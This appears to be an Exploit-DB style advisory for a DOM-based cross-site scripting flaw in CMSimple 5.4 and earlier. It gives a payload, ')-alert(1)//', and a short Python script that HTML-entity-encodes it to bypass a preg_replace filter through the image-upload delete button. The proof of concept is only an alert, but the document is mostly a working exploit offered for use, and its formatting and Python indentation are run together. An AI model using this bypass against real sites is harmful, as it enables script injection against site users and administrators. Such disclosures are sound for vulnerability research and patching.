# Exploit Title: CMSimple 5.4 - Cross Site Scripting (XSS)# Date: 22/10/2021# Exploit Author: heinjame# Vendor Homepage: https://www.cmsimple.org/en/# Software Link: https://www.cmsimple.org/en/?Downloads# Version: <=5.4# Tested on: Linux os[Description]
Since the application is filtering user inputwith preg_replace, attackers can able to bypass restriction by using HTML to Unicode encoding.
So the application let's attacker perform DOM based XSS.[Payload and POC]
File > images > Upload a file
Attack vector >> ')-alert(1)//(need to encode)>>')-alert(1)//
When the victim clicks the delete button,an alert will be executed.
Script to encode the payload
payload =input()
finalpayload =""for i in payload:
finalpayload = finalpayload +"&#"+str(ord(i))+";"print(finalpayload)
